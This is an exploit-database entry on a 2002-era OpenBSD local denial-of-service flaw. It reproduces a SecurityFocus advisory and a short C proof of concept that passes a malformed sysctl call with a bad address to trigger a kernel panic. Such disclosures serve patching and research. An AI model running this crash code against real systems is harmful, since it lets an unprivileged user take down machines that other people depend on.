OpenBSD Denial of Service Vulnerability

vendor:

OpenBSD

by:

SecurityFocus

7.5

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: OpenBSD

Affected Version From: OpenBSD

Affected Version To: OpenBSD

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

OpenBSD Denial of Service Vulnerability

A denial of service vulnerability has been reported for OpenBSD, specifically when handling malformed calls to sysctl. By invoking systcl and passing a specific flag in conjunction with a negative argument may trigger a kernel panic. This could be exploited by a malicious unprivileged local user to crash a target system.

Mitigation:

N/A

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/9073/info

A denial of service vulnerability has been reported for OpenBSD, specifically when handling malformed calls to sysctl. By invoking systcl and passing a specific flag in conjunction with a negative argument may trigger a kernel panic. This could be exploited by a malicious unprivileged local user to crash a target system.

The precise technical details regarding this vulnerability are currently unknown. This BID will be updated as further information is made available. 

#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main ()
{
unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;

return (sysctl (blah, 2, (void *) addr, &blah[1], 0, 0));
}